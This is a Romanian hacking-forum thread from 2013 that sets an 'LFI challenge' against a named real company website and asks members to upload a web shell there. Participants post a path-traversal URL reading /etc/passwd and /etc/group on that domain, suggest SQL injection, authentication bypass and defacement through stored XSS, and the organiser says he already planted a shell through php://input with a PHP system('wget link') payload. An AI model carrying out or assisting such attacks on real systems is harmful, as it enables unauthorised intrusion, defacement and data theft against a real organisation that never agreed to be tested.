[MEDIUM]Challange LFI

[FoxKids]

In acest challange trebuie sa uploadati un shell intr-un site prin metoda Locale File Include

Dupa ce terminati challange-ul trimiteti-mi link la shell pe privat.

Link Vulnerabil: HC HR Consulting Team - Recrutare, Consultanta, SSM - meta_title_ro

Castigatori

-

-

-

-

-

-

-

Prof.

[dr.d3v1l]

sigur ca è posibil ?

www.hchr.ro/?page=../../../../../../../../../../../../******************************* (etc/passwd

Vad un Sql

Edited October 13, 2013 by dr.d3v1l

[dancezar]

esti si sqli si ath bypass

//Poti pune si un proof?

Edited October 13, 2013 by danyweb09

[dr.d3v1l]

etc/group

[florin_darck]

PArerea mea: Vrei sa-ti bage tie cineva shell prin LFI ca tu nu reusesti

ps:

Daca tot vrea sa dea deface, tare greu era un deface via stored xss in admin panel

Edited October 13, 2013 by florin_darck

[dr.d3v1l]

doar ca sa dea deface.. cred

[FoxKids]

Eu deja am shell in firma ... are securitate 0... si lam uploadat prin php://input <? system ('wget link'); ?> o sa revin cu print